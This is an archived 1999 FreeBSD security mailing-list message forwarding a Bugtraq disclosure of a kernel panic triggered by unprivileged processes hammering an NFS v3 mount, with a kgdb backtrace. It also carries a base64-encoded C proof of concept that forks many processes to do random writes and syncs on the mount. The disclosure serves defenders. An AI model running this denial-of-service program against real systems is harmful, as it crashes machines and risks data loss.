From owner-freebsd-security  Sat Sep  4  7:29:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from drago.cert.org.tw (drago.cert.org.tw [140.117.100.10])
	by hub.freebsd.org (Postfix) with ESMTP id B0D3C15267
	for <security@FreeBSD.org>; Sat,  4 Sep 1999 07:29:05 -0700 (PDT)
	(envelope-from foxfair@drago.cert.org.tw)
Received: from foxfair (foxfair@foxfair.cc.nsysu.edu.tw [140.117.100.101])
	by drago.cert.org.tw (8.9.3/8.9.3) with SMTP id WAA60547
	for <security@FreeBSD.org>; Sat, 4 Sep 1999 22:26:28 +0800 (CST)
Date: Sat, 04 Sep 1999 22:28:24 +0800
From: Foxfair Hu <foxfair@drago.cert.org.tw>
To: security@FreeBSD.org
Subject: Fw: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ]
Message-Id: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA=="
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver 1.25.04
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA==
Content-Transfer-Encoding: 7bit
Content-Type: text/plain



Forwarded by Foxfair Hu <foxfair@drago.cert.org.tw>
---------------- Original message follows ----------------
 From: Sebastien Petit <spe@OLEANE.NET>
 To: BUGTRAQ@SECURITYFOCUS.COM
 Date: Thu, 2 Sep 1999 16:53:03 +0200
 Subject: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ]
--

Hi !

There is a problem with FreeBSD 3.2-RELEASE and -STABLE and perhaps
FreeBSD 3.x.
The system panics when a program does multiple access on nfs v3 mounted directory
with default mount options (ie: mount x.x.x.x:/nfs /usr2).
FreeBSD 3.2 crashes immediatly with no warnings and just a "panic: getnewbuf:
cannot get buffer, infinite recursion failure" without root privileges.
This is simple to reproduce with a program that creates a lot of process
(ie: 120) accessing the nfs mounted directory and just does "open", "seek",
"write", "close". NetBSD is not vulnerable.

gdb:
panic: getnewbuf: cannot get buffer, infinite recursion failure

syncing disks... panic: getnewbuf: cannot get buffer, infinite recursion
failure

dumping to dev 20001, offset 272816
dump 127 126 125 124 123 122 121 120 119 118 117 116 115 114 113 112 111 110
109 108 107 106 105 104 103 102 101 100 99 98 97 96 95 94 93 92 91 90 89 88
87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 70 69 68 67 66 65 64 63 62
61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35
34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7
6 5 4 3 2 1
---
#0  boot (howto=260) at ../../kern/kern_shutdown.c:285
285                     dumppcb.pcb_cr3 = rcr3();
(kgdb) where
#0  boot (howto=260) at ../../kern/kern_shutdown.c:285
#1  0xc012f87c in at_shutdown (
    function=0xc02075f1
<__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>,
    arg=0x200, queue=1174437888) at ../../kern/kern_shutdown.c:446
#2  0xc014dc9f in getnewbuf (vp=0xcc1edb40, blkno=2293824, slpflag=0,
    slptimeo=0, size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074
#3  0xc014e58c in getblk (vp=0xcc1edb40, blkno=2293824, size=8192,
slpflag=0,
    slptimeo=0) at ../../kern/vfs_bio.c:1511
#4  0xc014cd85 in bread (vp=0xcc1edb40, blkno=2293824, size=8192,
cred=0x0,
    bpp=0xcc3acbec) at ../../kern/vfs_bio.c:282
#5  0xc01b60f8 in ffs_update (vp=0xcc21ea40, waitfor=0)
    at ../../ufs/ffs/ffs_inode.c:98
#6  0xc01ba92f in ffs_fsync (ap=0xcc3acc74) at
../../ufs/ffs/ffs_vnops.c:258
#7  0xc01b8cb7 in ffs_sync (mp=0xc1d01c00, waitfor=2, cred=0xc0756300,
    p=0xc0246624) at vnode_if.h:499
#8  0xc0155f37 in sync (p=0xc0246624, uap=0x0) at
../../kern/vfs_syscalls.c:549
#9  0xc012f43d in boot (howto=256) at ../../kern/kern_shutdown.c:203
#10 0xc012f87c in at_shutdown (
    function=0xc02075f1
<__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>,
    arg=0x2000, queue=12443648) at ../../kern/kern_shutdown.c:446
#11 0xc014dc9f in getnewbuf (vp=0xcc243280, blkno=1519, slpflag=0,
slptimeo=0,
    size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074
#12 0xc014e58c in getblk (vp=0xcc243280, blkno=1519, size=8192,
slpflag=0,
    slptimeo=0) at ../../kern/vfs_bio.c:1511
#13 0xc017b9fa in nfs_getcacheblk (vp=0xcc243280, bn=1519, size=8192,
    p=0xcc36f700) at ../../nfs/nfs_bio.c:904
#14 0xc017b5a5 in nfs_write (ap=0xcc3acec8) at ../../nfs/nfs_bio.c:765
#15 0xc0159dea in vn_write (fp=0xc1d40d40, uio=0xcc3acf10,
cred=0xc1d36300,
    flags=0) at vnode_if.h:331
#16 0xc013a73a in dofilewrite (p=0xcc36f700, fp=0xc1d40d40, fd=3,
    buf=0x804b000, nbyte=102400, offset=-1, flags=0)
    at ../../kern/sys_generic.c:363
#17 0xc013a643 in write (p=0xcc36f700, uap=0xcc3acf94)
    at ../../kern/sys_generic.c:298
#18 0xc01e6edb in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 0,
      tf_esi = 12384951, tf_ebp = -1077945584, tf_isp = -868560924,
      tf_ebx = 12384951, tf_edx = 0, tf_ecx = 12384951, tf_eax = 4,
      tf_trapno = 7, tf_err = 2, tf_eip = 671700396, tf_cs = 31,
      tf_eflags = 582, tf_esp = -1077946192, tf_ss = 39})
    at ../../i386/i386/trap.c:1100
#19 0xc01dda5c in Xint0x80_syscall ()
#20 0x8048799 in ?? ()

Exploit nfsexp.c is attached to this message.

Spe & Gro.
---
spe@oleane.net
gro@oleane.net



--U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA==
Content-Type: application/octet-stream; name="nfsbench.c"
Content-Disposition: attachment;
 filename="nfsbench.c"
Content-Transfer-Encoding: base64

I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8
c3lzL3dhaXQuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu
Y2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHNpZ25hbC5oPg0KI2luY2x1ZGUgPHN0ZGlvLmg+
DQojaW5jbHVkZSA8c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDx0aW1lLmg+DQoNCnZvaWQgdXNyMSgp
IHsNCn0NCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKiogYXJndikgew0KICBpbnQgbmJmaWxz
Ow0KICBpbnQgbmJvcGVuOw0KICBpbnQgdGJsb2M7DQogIGludCB0ZmljaGllcjsNCiAgY2hhciBm
aWxlbmFtZVs1MTJdOw0KICBpbnQgaSwgaiwgaywgZjsNCiAgaW50IHBpZDsNCiAgc3RydWN0IHRp
bWV2YWwgc3RhcnQ7DQogIHN0cnVjdCB0aW1ldmFsIGVuZDsNCiAgZmxvYXQgZGVsYXk7DQogIHZv
aWQgKiBibG9jOw0KDQogIGlmIChhcmdjPDYpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwgIlN5bnRh
eDogJXMgcmVwX25mcy8gbmJfY2hpbGQgbmJfb3BlbiBzaXplZmlsZShLYikgYmxvY2tzaXplKGti
KS5cbiIsIGFyZ3ZbMF0pOw0KICAgIGZwcmludGYoc3RkZXJyLCAiaWU6ICVzIC9URVNULyAxMjAg
MjAwIDIwMDAwIDEwMFxuIik7DQogICAgZXhpdChFWElUX0ZBSUxVUkUpOw0KICB9DQoNCiAgbmJm
aWxzID0gYXRvaShhcmd2WzJdKTsNCiAgbmJvcGVuID0gYXRvaShhcmd2WzNdKTsNCiAgdGZpY2hp
ZXIgPSBhdG9pKGFyZ3ZbNF0pOw0KICB0YmxvYyA9IGF0b2koYXJndls1XSk7DQoNCiAgYmxvYyA9
IG1hbGxvYyh0YmxvYyAqIDEwMjQpOw0KICBtZW1zZXQoYmxvYywgMCwgdGJsb2MgKiAxMDI0KTsN
CiAgaWYgKCFibG9jKSB7DQogICAgZnByaW50ZihzdGRlcnIsICIlczogIiwgYXJndlswXSk7DQog
ICAgcGVycm9yKCJtYWxsb2MiKTsNCiAgICBleGl0KC0xKTsNCiAgfQ0KDQogIGZwcmludGYoc3Rk
ZXJyLCAiZm9ya2luZyAlZCB0aW1lcy4uLlxuIiwgbmJmaWxzKTsNCg0KICBzaWduYWwoU0lHVVNS
MSwgJnVzcjEpOw0KDQogIGogPSAwOw0KICBmb3IoaT0wO2k8bmJmaWxzO2krKykgew0KICAgIHBp
ZCA9IGZvcmsoKTsNCiAgICBpZiAocGlkPDApIHsNCiAgICAgIHBlcnJvcigiZm9yayIpOw0KICAg
ICAgYnJlYWs7DQogICAgfSBlbHNlDQogICAgICBqKys7DQogICAgaWYgKCFwaWQpIGJyZWFrOw0K
ICB9DQoNCg0KICBpZiAoIXBpZCkgew0KICAgIHBhdXNlKCk7DQogICAgcGlkID0gZ2V0cGlkKCk7
DQogICAgc3JhbmQocGlkKjEwKTsNCiAgICBmcHJpbnRmKHN0ZGVyciwgIlslZF0gY2hpbGQgJWQ6
IEhlcmUgSSBnbyFcbiIsIHBpZCwgaSk7DQogICAgc3ByaW50ZihmaWxlbmFtZSwgIiVzJWQiLCBh
cmd2WzFdLCBwaWQpOw0KICAgIGZvcihpPTA7aTxuYm9wZW47aSsrKSB7DQogICAgICBmID0gb3Bl
bihmaWxlbmFtZSwgT19DUkVBVHxPX1JEV1IsIDA2NjYpOw0KICAgICAgaWYgKGY8MCkgew0KCWZw
cmludGYoc3RkZXJyLCAiWyVkXSBmaWxlICVzICIsIHBpZCwgZmlsZW5hbWUpOw0KCXBlcnJvcigi
b3BlbiIpOw0KCWJyZWFrOw0KICAgICAgfQ0KICAgICAgayA9IChyYW5kKCkgJSAodGZpY2hpZXIg
KiAxMDI0KSk7DQogICAgICBqID0gbHNlZWsoZiwgaywgU0VFS19TRVQpOw0KICAgICAgaWYgKGoh
PWspIHsNCglmcHJpbnRmKHN0ZGVyciwgIlslZF0gIiwgcGlkKTsNCglwZXJyb3IoImxzZWVrIik7
DQoJYnJlYWs7DQogICAgICB9DQogICAgICAvLyByZWFkKGYsIGJsb2MsIHRibG9jKjEwMjQpOw0K
ICAgICAgaWYgKHdyaXRlKGYsIGJsb2MsIHRibG9jKjEwMjQpIT10YmxvYyoxMDI0KSB7DQoJZnBy
aW50ZihzdGRlcnIsICJbJWRdICIsIHBpZCk7DQoJcGVycm9yKCJ3cml0ZSIpOw0KCWJyZWFrOw0K
ICAgICAgfQ0KICAgICAgc3luYygpOw0KICAgICAgaWYgKGNsb3NlKGYpKSB7DQoJZnByaW50Zihz
dGRlcnIsICJbJWRdICIsIHBpZCk7DQoJcGVycm9yKCJjbG9zZSIpOw0KCWJyZWFrOw0KICAgICAg
fQ0KICAgIH0NCiAgICBleGl0KDApOw0KICB9DQoNCiAgc2xlZXAoMik7DQogIGdldHRpbWVvZmRh
eSgmc3RhcnQsIE5VTEwpOw0KICBraWxsKDAsIFNJR1VTUjEpOw0KDQogIGkgPSAwOw0KICB3aGls
ZSAoaTxuYmZpbHMpDQogICAgaWYgKHdhaXRwaWQoLTEsIE5VTEwsIDApPjApDQogICAgICBpKys7
DQoNCiAgZnByaW50ZihzdGRlcnIsICJ0aGV5J3JlIGFsbCBkZWFkIG5vdywgZXhpdGluZy5cbllv
dXIgc3lzdGVtIGlzIG5vdCB2dWxuZXJhYmxlXG4iKTsNCiAgZ2V0dGltZW9mZGF5KCZlbmQsIE5V
TEwpOw0KICBkZWxheSA9IGVuZC50dl9zZWMgLSBzdGFydC50dl9zZWMgKyAoKGZsb2F0KSAoZW5k
LnR2X3VzZWMgLSBzdGFydC50dl91c2VjKSkNCiAgICAvIChmbG9hdCkgMTAwMDAwMDsNCg0KICBp
ID0gbmJvcGVuICogdGJsb2MgKiBuYmZpbHM7DQoJDQogIGV4aXQoMCk7DQp9DQoNCg==

--U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA==--


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message